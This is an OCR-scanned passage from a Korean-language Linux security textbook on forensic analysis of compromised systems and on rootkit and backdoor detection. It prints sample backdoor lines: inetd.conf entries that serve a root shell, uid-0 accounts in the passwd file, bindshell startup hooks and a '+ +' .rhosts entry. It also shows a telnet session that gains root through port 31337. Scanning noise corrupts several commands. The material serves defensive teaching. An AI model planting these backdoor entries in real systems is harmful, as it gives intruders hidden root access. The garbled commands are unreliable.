피 해 체 계 의 디 스크내 용을 복사하여 분석 체 계 를 리 용해 서 분석 하는 방법 으로 
Forensics ” 에 서 증거 를 없 애 지 않기 위 한 분석 방법 이 다. 
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피해체계의 자원을 리용하지 않고 분석체계의 자원을 리용하기때문에 보다 정확한 분 
석 이 가능하다. 

분석체계준비，디스크복사 등 피해체계의 분석에 앞서 준비할 사항이 많으며 시간이 오 
래 걸린다. 

피해체계를 분석하기 위한 일반적인 절차는 다음과 같다. 분석체계의 준비과정은 정 
확한 분석과 철저한 증거보존을 위하여 꼭 필요한 절차이다. 

ᄄ여 벌복사 
ᄄ 분석체계준비 
ᄄ 체계상태의 정확한 기록 
亡〒 체계분석 
ᄄ 침입자추적 

피 해 체 계 분석 과정 에 있 어 서 기 록은 매 우 중요하다. 분석 을 시 작한 시 간，여 벌복사를 한 
시간，어떠한 내용을 검사하였는가에 대한 정보 등을 기록한다. 

그러면 피해체계분석절차에 따르는 매 공정들에 대해서 구체적으로 고찰하자. 

4.1.1. 여벌 복사 ( backup ) 

피해체계분석에 앞서 가장 먼저 해야 할 일은 자료의 여벌복사이다. 여벌복사는 보안 
에 있어서 가장 기본적 인 조치 이 다. 특히 봉사의 지속성 이 필요하여 실시 간으로 분석 하여 
야 할 경우와 보안업체의 전문가 등 제 3자가 분석하는 경우에 이것은 필수적 인 조치 이 다. 
왜냐하면 피해체계를 분석하거나 감시한다는것을 공격자가 알게 되면 체계전체를 삭제하는 
경우가 있으며 제3자가 분석하는 경우에는 이에 대한 책임을 져야 할수도 있기때문이다. 

4.1.2. 분석준비작업 

피해체계분석시 보다 철저한 증거보존과 정확한 분석이 필요할 때에는 전용분석체계 
를 리용한다. 

1) 분석체계준비 

LINUX 는 대부분의 파일체계를 지원하기때문에 어떠한 피해체계이든지 그 파일체계 
를 복사해서 분석체계 에 붙이기 가 쉽다. 

LINUX 는 또한 ’’ loopback ” 장치 를 가지 고있기 때 문에 n dd ” 명 령 을 리 용한 bit 단위 의 디 
스크내 용 복사본파일을 분석체 계 에 탑재하여 사용할수 있다. 

2) 디스크내용복사 

분석 체 계 가 준비 되 였 으면 피 해 체 계 의 디 스크내 용을 복사하여 야 한다. 이 과정 은 증거 
보존을 위한 중요한 작업 이 다. 일 반적 으로 여 벌복사에 사용되 는 tar , dump 와 같은 명 령 
은 피햇색ᅵ계 의 상태 를 정 확히 복사하지 못한다. 따라서 bit 단위 로 디 스크를 복사하는 M dd M 
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명 령 을 사용하여 복사한다. 다음의 경 우는 망을 동하여 피 해 체 계 의 디 스크를 구획 별로 분 
석체계로 복사하는 방법을 보여준다. 증거를 보존하기 위해서는 절대로 피해체계의 디스 
크를 직 접 분석하지 말고 복사된 정보를 분석 하여 야 한다. 피 해체 계의 파일체 계정보는 
” /etc/fstab” 파일을 참조하면 된다. 

분석체계 : nc -1-p 10000>victim.hda2dd 

피 해 체 계 : / cdrom/dd bs=1024</devhda2 1/cdrom/nc 172.16.1.110000 ~w3 

해체계의 디스크내용을 구획별로 복사한 뒤에는 이것을 분석체계에 탑재하여 분석을 시 
작하면 된다. LINUX 체 계 의 loopback 장치 를 리용하여 다음과 같이 피 해체 계의 디스크복 
사본을 탑재한다. 

#mkdir /t 

# mount -or o, loop, nodev, noexec victime. hda2. dd/1 

#mount -or o, loop, nodev, noexec victime. hdal. dd/t/home 


4.1.3. 체계상태의 정확한 기록 

공격 자는 언제든 체 계를 변경하거 나 파괴할수 있다. 따라서 공격흔적 을 될수륵 보존 
하려면 체계를 재기동시키거나 망을 분리할수 있다. 하지만 이러한 작업은 공격자의 가입 
등록상태，망련결상태 등 피해체계의 몇가지 중요한 현재 상태정보를 잃게 만든다. 

따라서 피 해 체 계 를 격 리 하기 전 에 현재 의 체 계 상태 를 정 확히 파악하여 야 한다. 이 것 은 
범 죄 현장을 손상없 이 그대 로 보존하는것 과 같다. 비 록 rootkit 또는 뒤문 등으로 인하여 거 
짓정 보가 나타날수도 있지 만 이 에 대 한 자세한 분석 은 이 후의 절 차에 따라 수행하여 야 한 
다. 이러한 피해체계상태에 대한 정보수집은 직결상태에서 분석하는 경우에도 필요하며 이 
후의 분석작업을 쉽게 해준다. 

다음과 같은 명 령을 사용하여 피 해체계의 현재 프로쎄스，주요설정파일，열린 파일，가 
입등록사용자정 보，망상태 등에 대 하여 따로 기 록하여 보관한다. 

^ "ps - elf ' 또는 M ps - aux M ： 현재 체계에서 수행중인 프로쎄스상태를 보여준다. 

여 M lsof M : 현재 체 계 상의 모든 프로쎄 스와 프로쎄 스가 사용하는 포구，열린 파일 을 
보여 준다. 

亡〒 ’’netstat _ na n : 현재 망활동에 대한 정보 

u ’’ last ’’: 사용자말단에 대한 가입등록 및 가입랄퇴 (log out ) 정보를 보여준다. 

^ M who M : 현재 체계에 있는 사용자를 보여준다. 

^ ’’find / -ctime -ndays _ ls n : ndays 이전의 시점부터 현재까지 ctime 이 변경된 모 
든 파일을 찾아준다. 하지만 이것은 파일의 접근시간 ( atime ) 을 변경시킨다. 따라서 침입 
자가 어떠한 파일에 접근했는지 알고싶은 경우에는 사용하지 않도륵 한다. 


錢變邊 錢變變©繼繼 






Lirnix 당보안 


또한 nmap 를 리 용하여 다른 체 계 에 서 피 해 체 계 의 모든 열 린 포구를 검 사하여 기 륵 
할수 있다. 이것은 피해체계를 분석하는데 큰 도움이 된다. 

nmap 一 sT -p 1-65535 xxx. xxx. xxx. xxx (피 해 체 계 IP 주소) 

nmap-sU-p 1-65535 xxx. xxx. xxx. xxx (피 해 체 계 IP 주소) 

만일 피 해체계를 격 리해서 분석하려 고 하는 경우에는 체계를 재 기동시 키 기 보다는 망 
을 분리하는것 이 적 당하다. 공격 자가 체계 에 련결 되 여있는 경우 공격 자는 관리 자가 체계 
를 재기동시 킨다는것을 알수 있으며 이것은 공격 자를 자극하여 체계전체를 파괴할수도 있 
기때문이다. 경우에 따라서 피해체계를 격리하지 않고 인터네트에 련결된 상태에서 분석 
할수도 있다. 이 런 경우에는 공격자로부터의 파괴위험을 각오하여 야 한다. 

제2절. 체계분석 

침입을 당한 체계는 침입자의 흔적제거 및 재침입을 위한 뒤문 (backdoor) 또는 트로 
이목마 (Trojan Horses) 프로그람 등이 설치되게 된다. 트로이목마는 정상적인 기능을 수 
행하는것 처 럼 보이 나 실제 로 다른 기 능을 수행하는 프로그람이고 뒤문 (backdoor) 은 체 계 
에 인증되지 않은 접근을 가능하게 하는 프로그람을 말하는데 때로는 트로이목마가 체계 
의 불법적인 침입을 위한 뒤문으로 사용되기도 한다. 

그리 고 이 러한 프로그람을 모아놓은 rootkit 이 라고 부르는 패키지도구가 존재 하며 매 
조작체 계 종류별 로 공개 되 여 있 다. 특히 Is, netstat, ps, login, ifconfig 등의 체 계 파일 을 변 
조하여 공격자가 만든 파일，프로쎄스，망 련결상태 등이 보이지 않도륵 한다. 

즉 피해체계분석에 있어서 피해체계의 체계명령을 리용하여 제공되는 모든 정보는 믿 
을수 없는 정보가 된다. 정확한결과를 얻기 위해서는 피해체계의 파일체계를 준비된 분 
석체계에 하여 분석체계의 명령을 사용하여야 한다. 만약 실시간적으로 빠른 분석을 해야 
할 경우에는 주요 체계명령들이 변조되였는가를 검사하고 변조되였을 경우에는 똑같은 판 
본의 다른 체계에서 해당 파일을 복사해서 사용하거나 설치패키지를 부분별로 다시 설치 
하여 사용하여야 한다. 

공격 자는 rootkit 이 외 에 도 자신 이 해 킹 한 체 계 에 재 침 입 하기 위 하여 뒤 문 (backdoor) 
을 만들어놓기 도 한다. 이 리 한 뒤문은 새 로운 계정 생성，계정 도용， root 쉘포구 생성 그 
리 고 앞에서 언급한 rootkit 에서 제공하는 기능을 병 행 하여 사용하는 등 매우 다양하다. 정 
확한 체계분석을 위해서는 공격자들이 사용하는 이러한 rootkit 와 뒤문에 대해서 잘 알아 
야 한다. 많이 알수록 그만큼 더 빨리 분석할수 있 다. 
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4.2.1. rootkit 분석 

rootkit 는 지 속적 으로 기 능이 갱 신되 면 서 공개 되 고있 다. LINUX 의 경 우 Irk (Linux 
RootKit)3, lrk4, lrk5 등 판본이 계속 갱신되면서 나오고있다. 몇가지 rootkit 의 기능 및 
사용법 에 대 하여 리해하게 되면 대부분의 rootkit 에 대 하여 리해할수 있고 이것은 체계분 
석에 필수적 인 기초지식 이 된다. 다음은 대표적 인 rootkit 에서 사용되는 트로이목마 판본 
의 프로그람과 뒤문에 대하여 설명한다. 


1) lrk5 (Linux Rootkit IV) 

一 기정 rootkit 설 정파일 

/dev/ptyr: Is 명령으로부터 숨기고싶은 파일이나 등록부를 지정 

/dev/ptyq ： netstat 명령으로부터 숨기고싶은 특정 IP 주소， UID, 포구번호를 지정 

실례; /dev/ptyq 파일의 내용 및 설명 

1 128.31 <— 128.31.X.X 로부터의 모든 접속을 보이지 않도륵 함 

졌 발견된 /dev/ptyq 파일에서 공격자가 128.31 망주소를 가지고있음을 알수 있으며 
정확한 공격자의 IP 주소를 추적하기 위해서는 128.31 망주소에 대하여 감시하여야 한다. 
/ dev/ptyp : ps 명령으로부터 숨기고싶은 프로쎄스 지정 

一 주요 트로이 목마/뒤문 설 치프로그람 

bindshell: 특정 한 포구에 root 월 을 련결 시 켜 해 당 포구로 접 속하면 root 권한 획 득 

chsh: 일반 사용자에게서 root 권한 획득 

crontab : 특정 Crontab 내용을 숨기는 프로그람 

find ： / dev/ptyr 파일 에 지 정 된 내 용을 숨겨 주는 변조된 find 명 령 

ifconfig : PROMISC 기 발을 숨겨 주는 변조된 ifconfig 명 령 

inetd : 원격 접 근을 허 용하는 변조된 inetd 프로그람 

linsniffer : 엿 듣기 프로 그 람 

login ： 원격접 근을 허 용하는 변조된 login 프로그람 

Is: /dev/ptyr 파일에 지정된 내용을 숨겨주는 변조된 Is 프로그람 

netstat : /dev/ptyq 파일 에 지 정된 내 용을 숨겨 주는 변조된 netstat 프로그람 

passwd: 일반 사용자에게 root 권한을 주는 passwd 프로그람 

ps: /dev/ptyp 파일 에 지정 된 프로쎄 스를 숨겨 주는 ps 프로그람 

rshd ： 원격접 근을 제 공하는 rshd 프로그람 

sni 伴 chk: 엿듣기가 실행되고있는가를 검사하는 프로그람 

syslogd: 기 록을 숨겨 주는 syslogd 프로그람 

tcpd ： 특정 련결 을 숨기 고 련 결 이 거 부 (deny) 되 지 않도륵 해 주는 TCP-Wrappei •의 tcpd 
프로그람 

top ： 프로쎄 스를 숨겨주는 top 프로그람 

wted: wtmp/utmp 파일 편집 기 (가입 등록정 보를 삭제 할 때 사용됨 ) 


錢變邊 錢變變©繼鹽 





Lirnix 당보안 


2) Ambient’s Rootkit ( Linux ) 

一 기정 rootkit 설 정파 일 

/ dev / ptyxx / log : syslogd 에 기록되지 않게 하려는 문자렬지정 
/ dev / ptyxx /. file : Is 명 령으로부터 숨기고싶은 파일이 나 등록부를 지정 
/ dev / ptyxx/proc : ps 명령으로부터 숨기고싶은 프로쎄스지정 

/ dev / ptyxx / addr : netstat 명령으로부터 숨기려는 특정 IP 주소， UID , 포구번호 지정 
— 주요 트로이목마/ 뒤문프로그람 

syslogd : / dev / ptyxx / log 파일에 지정된 문자렬인 경우 기록을 남기지 않음 

sshd ： 지 정된 통과암호를 사용하여 root 로 가입등록 가능 

Is : / dev / ptyxx /. file 에 지정된 파일 및 등록부를 숨김 

du : / dev / ptyxx /. file 에 지정된 파일 및 등록부를 숨김 

netstat : / dev / ptyxx / addr 파일에 지정된 련결，포구 등을 숨김 

ps ： / dev / ptyxx / proc 파일에 지정된 이름의 프로쎄스를 숨김 

pstree : / dev / ptyxx / proc 파일 에 지 정 된 이 름의 프로쎄 스를 숨김 

killall : / dev / ptyxx / proc 파일 에 지 정 된 이 름의 프로쎄 스를 숨김 

top : / dev / ptyxx / proc 파일에 지정된 이름의 프로쎄스를 숨김 

4.2.2. 뒤 문 (backdoor) 분석 

공격자는 자신이 침입한 체계에 들키지 않고 손쉽게 재침입하기 위하여 뒤문을 만들 
게 된 다. 앞에 서 설 명한것 처 럼 rootkit 의 트로이 목마뒤문을 사용하거 나 일 반 뒤문을 만들 
어 사용하거나 또는 특정 한 뒤 문을 사용하지 않고 재침 입할 때마다 취약점을 공격 하여 침 
입 한다. 뒤문의 기 본목적 은 다음과 같다. 

첫째로; 관리자가 통과암호교체，보안수정 등의 보안조치를 한 뒤에도 다시 체계에 들 
어올수 있도륵 한다. 

둘째로; 체계기록파일이나 감시명령에서 검출되지 않도륵 한다. 

셋째로; 최단시간에 손쉽게 체계에 접속할수 있도륵 한다. 

사실상 뒤문은 그 형태가 매우 다양하고 교묘하게 만들수 있기때문에 모든 뒤문을 찾 
아서 제 거 하기 는 매 우 힘 들다. 다시말하면 누구도 모든 뒤 문/트로이 목마를 제 거 했다고 장 
담할수 없다는것 이다. 

그러면 여 러 가지 형 태의 뒤문에 대 해서 구체 적 으로 고찰하자. 

1) 통과암호 뒤문 

가장 전통적 인 방법 으로 통과암호파일 을 해 킹하여 특정사용자의 ID 와 통과암호를 리 
용하여 체계에 접근한다. 이것은 정상적인 가입 등록과 구별하기 어렵기때문에 검 줄하기가 
쉽ᅪ 않다. 보통 일 반 사용자의 등록부와 history 파일，그리 고 가입 등록기 록을 분석 하여 이 
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상한 점을 찾아내는데 이것은 구체적인 체계관리자만이 판단할수 있다. 

또 다른 방법 은 통과암호파일에 uid 가 0인 계정(관리 자권한을 가진 계정)이 나 일반 
사용자계정을 추가하여 해당 계정을 사용하는 방법 인데 이것은 관리자가 쉽게 검출할수 있 
음에도 불구하고 종종 사용되는 방법 이 다. 

실 례 ; 불법 계 정 이 추가된 / etc/passwd 파일 


reeflx : 0:0:: / tmp / bin/csh 
rewt :: 0:0:: / tmp / bin/bash 

공격 자가 일 반사용자계 정 을 리용하여 가입등록하는 경 우 root 권한을 획 득하기 위 한 뒤 
문을 만들어 놓게 되 는데 다음과 같이 주로 suid , sgid 를 설정한 파일을 리용한다. 아래 의 
n sha n 는 ” / bm / sh ” 프로그람을 복사한 파일 이다. 

[ lotusSLinux ] $ls -al . /. sha 

- rwsrxr-x 1 root root 373176 Jan 30 17:24 ./. sha * 

[ lotus 9 Linux ] $id 

uid =506( lotus ) gid =506( lotus ) groups =506( lotus ) 

[ lotus 9 Linux ] $. /. sha 
[ lotus 9 Linux ] #id 

uid =506( lotus ) gid =506( lotus ) euid =0( root ) groups =506( lotus ) 

[ lotusQLinux ] # 

아래 와 같은 방법 으로 suid , sgid 가 설정 된 파일을 찾아 뒤문을 찾아낼수는 있으나 사 

실 UNIX 에 는 수많은 suid , sgid 파일 들이 있 어 어 느것 이 뒤문인지 구별 하기 는 쉽 지 않다. 

따라서 보통 아래와 같은 명령을 리용하여 suid , sgid 가 설정된 파일에 대하여 목록을 만 
들어 두는것이 좋다. 

find / -type f perm -04000 -Is #SUID 파일 찾기 

find / -type f perm -02000 -Is #SGID 파일 찾기 

2) login 뒤문 

login 프로그람은 LINUX 에 서 telnet 등을 리용하여 접 속할 때 통과암호를 통한 사용 
자인증에 사용된 다. 공격 자는 이 려 한 login 프로그람을 수정 하여 특정통과암호가 입 력 될 때 
는 root 권한으로 가입등록이 될수 있도륵 만든다. 그리고 이러한 통과암호를 리용하여 가 
입등록할 때 에는 기 록파일 에 남지 않도륵 한다. 일반적 으로 관리 자는 " strings ” 명 령 으로 
login 프로그람에 서 이 러 한 통과암호문구를 확인하거 나 truss 명 령 으로 정 상적 인 login 프로 
그람과 비 교해보거 나 또는 파일의 생성시 간을 확인하여 트로이 목마 login 프로그람을 알아 
낼수 있다. 
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3) telnetd 뒤문 (봉사 뒤문) 

login 뒤문은 많이 알려져 있어 관리 자는 자주 login 프로그람을 검 사한다. 따라서 공 
격 자는 login 프로그람 대 신에 in . telnetd 프로그람을 트로이 목마프로그람으로 바꿔 놓기 도 한 
다. 일반적으로 트로이목마 in . telnetd 프로 그람은 특정 한 말단 ( Terminal ) 설정을 가지는 의 
뢰 기 에 게 root 월 을 제 공하는 기 능을 가진 다. 

telnetd 뒤 문처 럼 위 조된 ( trojanized ) 봉사기 를 설 치 하여 공격 자가 들어 올수 있도륵 하 
는 뒤문을 일 반적 으로 봉사뒤문이 라고 한다. 현재 까지 sshd , tcpd , rlogin , rsh , inetd 등 
망봉사를 제 공하는 거 의 모든 봉사기 들에 대 한 트로이 목마 판본의 프로그람이 공개되 여 돌 
아다니 고있 다. 

4) 설정파일을 리용한 뒤문 

일 반적 인 봉사를 제 공하는 봉사기 의 설 정 파일 을 수정 하여 공격 자가 들어 올수 있도륵 하 
는 방법 이 다. 가장 많이 쓰이 는 방법 은 인 터네 트 Super 봉사기 인 inetd 의 설 정파일 을 리 
용하여 공격 자가 들어올수 있는 뒤문을 만드는것 이 다. inetd 봉사기 는 접 속요청 이 들어오 
면 / etc / inetd . conf 설정 파일 을 읽 어 해 당 망봉사기 를 띄 워 주는 역 할을 하는 데 몬이 다. 다 
음의 실례 는 공격 자에 게 뒤 문을 제 공하는 inetd . conf 파일의 내 용이 다. 

실태 ; 위든이，숨여진 /etc/inetd.conf 파일 

ingreslock stream tcp no wait root / bin/sh sh_i 

2222 stream tcp no wait root / bin/sh sh_i 

뒤문을 제 공하는 또 다른 실례 로 시 작각본파일 에 뒤문을 만드는 명 령 코드를 삽입하는 
방법이 있다. 이것은 체계가 재기동되더라도 뒤문이 실행되게 하여 공격자가 이것을 언제 
든지 리용할수 있도륵 한다. 다양한 방법 이 사용될수 있으나 주로 발견되 는 rc . local 의 례 
를 들어 설명한다. 이 리 한 뒤문이 rootkit 와 함께 설 치되면 이것 을 찾기 가 힘 들어 진다. 

설레 f; 위문이，숨서진 /etc/rccf/rc. 【 oca 【파일 


echo ’ ’ $ R ’ ’〉〉/ etc/issue 

echo kernel $ (uname - r ) on $a $ (uname _ m ) ’ ’〉>/ etc/issue 
cp 一 f / etc/issue / etc / issue , net 
echo >>/ etc/issue 
fi 

/ bin/bindshell 


{I 
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실케 2; 위든 。 f •숨겨진 /etc/rcd/rc.sysinit 파일 

dmesg >/ var / log/dmesg 

/ bin/bindshell 

다음과 같이 bindshell 프로쎄스를 확인해보면 31337번포구가 열려 있음을 확인할수 있 
고 31337포구로 접속해보면 root 권한으로 접속할수 있음을 알수 있다. 

[ victime : root / etc ] #ps -ef | grep bindshell 

root 651 1 0 17:12 ttyl 00:00:00 . /bindshell 

[ victime : root / etc ] #lsof -p 651 

COMMAND PIDUSER FD TYPEDEYICE SIZE NODE NAME 

bindshell 651 root 3 u inet 880 TCP *： 31337 ( LISTEN ) 

[ victime : root / etc ] #netstat - a | grep 31337 
tcp 0 0 *:31337 *:* LISTEN 

[ attacker : root /] #telnet xxx . xxx . xxx . 31 31337 
Trying xxx . xxx . xxx . 31 … 

Connected to xxx . xxx . xxx . 31. 

Escapecharacteris ’ 시， . 


uid =0 ( root ) gid =0 ( root ) groups =0 ( root ) ， 1 ( hin ) ， 2 ( daemon ) ， 3 ( sys ) ， 4 ( adm ) ， 6 ( disk ) ， 
10 ( wheel ) 

： command not found 

.rhosts 뒤 문은 가장 오래된 뒤 문중의 하나이다. .rhosts 파일에 《+ +》가 있게 되면 모 
든 호스트에 서 rlogin , rsh 명 령 을 리용하여 통과암호없 이 가입등록할수 있 다. 

5) Cronjob 뒤문 

cnm 은 체 계관리 를 자동화해 주는 매 우 유용한 도구인 반면에 뒤문을 만드는데 있 어 서 
도 매 우 유용하다. 일 반적 으로 특정 시 간에 트로이 목마뒤문을 실행시키 도록 cron 표에 뒤문 
을 만들수 있다. 일반적인 cron 표의 위치는 / var / spool / cron / crontabs / root 이다. 다음은 
trinooagent 가 설치된 체계에서 root 의 crontab 내용이다. 

/ var / spool / cron / crontabs/root 
* ****/ dev / isdn / subsys/tsolnmb >/ dev / null 2 >&l 
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cron 을 리용한 뒤문은 매 우 다양하게 만들수 있 다. 례 를 들면 새 벽 1시 에 통과암호 
파일에 새로운 계정을 추가했다가 새벽 2시에 통과암호파일을 원 rjk 상태로 돌려놓도륵 
cronjob 을 만들어놓는 경우도 있다. 공격 자는 새벽 시간 1~2시사이 에 체계 에 들어갈수 있 
으며 관리 자가 cron 표를 검 사하지 않는 이 상 로출되 지 않는다. cron 을 리용한 또 다른 방 
법 은 이 미 cron 표에 등록되 여있는 정 상적 인 프로그람을 트로이 목마프로그람으로 바꾸는것 이 
다. 관리 자는 cron 표를 검사하여도 이상한것을 발견하지 못한다. 또한 Irk 에는 특정 cron 항 
목이 보이지 않게 하는 프로그람이 있기때문에 이것을 리용하면 더욱 찾아내기 힘들게 된다. 

6) Library 뒤문 

LINUX 체 계 는 프로그람의 크기 를 줄이 기 위해 자주 사용되 는 루린을 재 사용하는 공 
유서고 Uhared Libraries ) 를 리 용한다. 어떤 공격자는 이러한 서고에 뒤 문을 만든다. 례 
를 들면 login 프로그람이 사용하는 cryptO 루린에 root 4 ! 뒤문을 만들어놓을수 있다. 

7) 핵심부 ( kernel ) 뒤 문 

체계는 사용의 편리를 위해 실행되고있는 핵심부에 새로운 기능을 하는 핵심부모둘을 
적재 할수 있도륵 되여 있다. 이러한 편리성은 공격자에게 핵심부뒤문을 손쉽게 설치 할수 있 
도륵 한다. 사실 핵 심부뒤문을 교묘하게 설치하게 되 면 이것을 찾는것은 거의 불가능하다. 
현재 체 계 별 로 핵 심 부뒤 문에 대 한 문서 와 도구들이 나와 있 기 때 문에 가장 위 협 적 인 뒤 문 
이다. 공격자들이 핵심부뒤문도구를 기정으로 사용하는 경우에는 찾아낼수 있겠지만 핵심 
부뒤문을 제대로 사용할줄 알게 되면 피해체계에서 공격흔적을 찾는것이 매우 힘들어질것 
이다. 

8) 파일체계뒤문 

많은 공격자들은 자신이 사용하는 공격프로그람，망도청자료，원천코드 등을 저장하 
기 위해 파일체계를 리용하며 그리고 이것을 보이지 않게 숨기기 위하여 위조된 Is , du 등 
과 같은 rootkit 프로그람을 리용한다. 하지 만 이것 은 숙련된 관리 자에 의해 쉽 게 로출될 
수 있 다. 따라서 좀더 높은 수준의 공격 자는 일 반 파일 체 계 를 리용하지 않고 하드디 스크 
에 자신만이 접 근할수 있는 부분을 만들어놓고 이것 을 리용하기 도 한다. 일 반 관리 자에 게 
이 부분은 "bad sector ” 로만 보일것 이 다. 

9) 망뒤문 

공격 자는 체 계 에 서 뿐만아니 라 망통신흐름량도 가능한 숨기 려 고 한다. 그리 고 이 러 한 망 
뒤문은 방화벽을 우회할수 있는 수단을 제공할수 있다. 망뒤문은 주로 특정한 포구번호를 
사용하지만 이것은 관리자가 쉽게 알아낼수 있기때문에 포구를 사용하지 않는 뒤문을 사 
용한다. 




鍾變邊 鍾變變©繼繼 





제 4 광. LINUX 방보<延윷 到起 체제€정 덫 께해께척 


— TCP 쉘뒤문 

특정한 포구번호를 사용하여 공격자로부터 의 접 속을 받아들이는 뒤문이 다. 일 반적으 
로 다른 사람은 접근할수 없도록 자신만이 아는 통과암호를 걸어놓는다. 이것은 netstat 
명령이나 nmap 등의 포구스캐너를 리 용하여 열려 진 포구를 찾아낼수 있지만 SMTP 처럼 
흔히 사용되 는 포구를 리용하면 관리 자는 해 당 포구가 뒤문인지 아니 면 정 상적 인 봉사인 
지 구별하기 힘들게 된다. 

— UDP 쉘뒤문 

UDP 파케 트를 리용한 뒤문으로 TCP 처 럼 련결 이 이 루어 지 지 않기 때 문에 netstat 명 령 
으로 공격자가 접속하는것을 알아내지 못한다. 또한 방화벽에서 열려진 UDP 포구를 사용 
하여 방화벽 을 우회 할수도 있다. 하지 만 이 것도 nmap 등의 포구스캐 너 를 리 용하여 열 려 
진 포구를 찾아낼수는 있다. 

— ICMP 쉘뒤문 

ping 은 가장 널리 사용되는 망프로그람이다. icmp 뒤문은 이러한 ping 파케트에 자료 
를 담아 전달하는 뒤문이 다. 흔히 covert 통로라고도 한다. 관리 자는 단순히 ping 이 오고 
가는것 으로만 판단하게 되며 이것을 검출하기 위 해서는 ping 자료파케트를 분석해 야 한다. 
이 미 DDoS 도구인 TFN 에 서 사용되 였 다. 다음은 nmap 를 리용하여 특정 TCP 포구가 열 려 
있는가를 검사하는 방법이다. 제일 마지막 포구번호가 열려있는데 이것은 정상적인 봉사 
가 아니 다. telnet 로 접 속해 서 뒤 문포구임 을 확인해 볼수 있 다. 

#nmap -sT -p 1-65535 xxx. xxx. xxx. xxx 

SO M mgnmapV. 2. 3BETA6byFyodor(0odor9dhp. comwwwinsecure.org/nmap/) 

Interestingportsonvict- (xxxxxxxxxxxx) : 


Port 

State 

Protocol 

Service 

7 

open 

tcp 

echo 

19 

open 

tcp 

chargen 

65535 

open 

tcp 

unknown 


frtelnet xxx. xxx. xxx. xxx 65535 
Trying xxx. xxx. xxx. xxx* • • 
Connected to xxx. xxx. xxx. xxx 
Escape character is ’ 

# 
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4.2.3. 체계프로그람변경확인 

앞에 서 설 명한것 처 럼 공격 자의 흔적 을 감추는 다양한 rootkit , 트로이 목마，뒤문프로 
그람이 있기때문에 피해체계의 체계명령은 믿고 사용할수가 없다. 그리고 정확한 분석과 체 
계복구를 위해서는 이러한 모든 프로그람을 찾아내야 한다. 물론 체계 재설치라는 간단한 
복구방법이 있기는 하지만 정확한 분석이 따르지 않는 복구는 결국 지속적인 침입을 당하 
게 만든다. 다음은 어떠한 프로그람들이 변경되였는가 확인할수 있는 방법을 설명한다. 

1) 체계프로그람의 파일크기, Timestamp (생성시간，변경시간 등)확인 

Is , ps , netstat 등 트로이목마로 자주 사용되는 프로그람의 파일크기를 똑같은 조작 
체 계판본의 다른 체 계프로그람과 비 교하여 변조여 부를 알수 있 다. 또 다른 방법 은 해 당 프 
로그람의 생성날자 또는 변경시 간을 다른 체 계명 령의 날자와 비 교하여 변조유무를 알수 있 
다. 만약 프로그람의 크기가 다르거나 날자가 다르다면 프로그람이 변조되였을 가능성 이 매 
우 크다. 하지만 이러한 프로그람의 크기와 timestamp 를 마음대로 설정 할수 있는 공격 프 
로그람이 있기때문에 효률적인 방법은 아니다. 

2) 체 계호출추적 

트로이목마로 의심 이 가는 프로그람 ( Is , ps , netstat 등) 이 실행될 때 호출되는 체계 
호출과 정상 적 인 프로그람의 체계 호출을 비교하여 체계명령의 변조유무를 확인할수 있 
다. truss 나 strace 명 령을 리용할수 있다. 

3) 완전성검사 

MD 5 등의 검 사합을 리용하여 파일의 변조유무를 알아낼수 있 다. 보통 tripwire 와 같 
은 완전성 검사도구로 체계 파일에 대해 관리를 하고있는 경우에는 쉽게 체계명령의 변조 
유무를 알아낼수 있 다. 하지 만 검 사합의 자료기 지 ( DataBase ) 가 해 킹 당한 체 계 안에 있 다면 
공격자가 검사합값을 위조할수 있기때문에 이것도 또한 완전히 믿을수 있는것은 아니다. 

완전성 을 검 사하는 다른 방법 중의 하나는 조작체 계 판매 자가 제 공하는 검 사합값을 리 
용하여 비 교해보는 방법 이 있 다. 

다음은 LINUX 체 계 에서 이 리 한 검 사합값을 비 교해보는 방법 을 설명한다. 

아래와 같은 명령을 리용하여 모든 설치된 패키지 또는 특정패키지의 변조유무를 검 
사할수 있다. 

#rpm -V -a > 모든 설치된 패키지의 변화에 대하여 검사 

#rpm -V 패키지 이름 〉특정패키지 에 대해서만 변화여부 검사 

다음은 피해체계에서 rpln 명령을 리용하여 트로이목마 Is 프로그람을 확인한 실례이다. 

[ victimSconsult / root ] # rpm-V fileutils 






S : 프로그람의 크기가 변경 
5 : md 5 검사합값이 변경 
T : 파일의 mtime 값이 변경 
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다음은 redhat Linux 에서 검사해 볼 필요가 있는 주요패키지 이름 및 포함된 프로그람 
에 대 한 정 보이 다. 

util ~ Linux 2. 7_18 
/ usr / bin/chsh 
/ bin/login 
f : leutils - 3. 16~9 
passwd -0. 50-11 
procps -1.2.7~5 
/ usr / bin/top 
rsh _0.10-4 
net - tools -1.33~6 
/ sbin/ifconfig 
sysklogd -1.3~22 
netkit - base -0.10-10 
tcpwrappers -7. 6~4 
psmisc - 17-3 
SysVinit -2. 74-4 
findutils -4. 1_23 

4.2.4. 피해체계분석 

피해체계를 분석한다는것은 결국 공격의 흔적 즉 증거를 찾아내는 과정 이다. 하지만 이 
에 대한 방법이나 절차는 일반적으로 정식화되여있지 않고 주로 경험을 통하여 이루어지 
는 경우가 많았다. 최근에 "Computer Forensics " 라는 이름으로 이러한 방법에 대하여 과 
학적으로 접근하려는 시도들이 많이 나타나고있다. 여기서는 공격자들이 사용하는 공격도 
구， rootkit , 뒤 문 또는 트로이 목마에 대 한 지 식 을 바랑으로 피 해 체 계 를 분석 하는 방법 에 
대하여 설명한다. 그리고 이리한 분석을 체계적으로 도와주는 공개용도구를 리용하는 방 
법 도 소개한다. 


/ usr / bin/chfn 

/ bin/ls 

/ usr / bin/passwd 
/ bin/ps 

/ usr / sbin / in . rshd 
/ bin/netstat 

/ usr / sbin/syslogd 
/ usr / sbin/inetd 
/ usr / sbin/tcpd 
/ usr / sbin/killall 
/ sbin/pidof 
/ bin/find 
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1) 체계상래자료분석 

먼저 앞에서 수집했던 정보를 주시한다. 이 정보는 rootkit 이나 뒤문이 설치되여있지 
않는 경 우에 정 확한 정 보를 보여준다. 

— ps ： 망도청 또는 취 약점훑기프로그람 등 공격프로그람이 실행 되 고있는가를 주시 
한다. 주로 보통 보지 못했 던 프로쎄 스를 확인해보면 된 다. 

一 lsof ： 체계의 모든 프로쎄스가 사용하는 열려진 파일정보를 보여준다. 

一 netstat ： 봉사하지 않는 포구가 열려있는지 또는 이상한 싸이트로 접속이 되여있 
는지 확인한다. 

一 last : 사용하지 않는 계 정 또는 이 상한 싸이 트에 서 가입 등록한 정 보를 확인한다. 

一 who ： 누가 접속해 있었는가를 확인한다. 

一 nmap 포구훑기결과: 피 해 체 계 에 이 상한 포구가 열 려 있는가를 확인한다. 

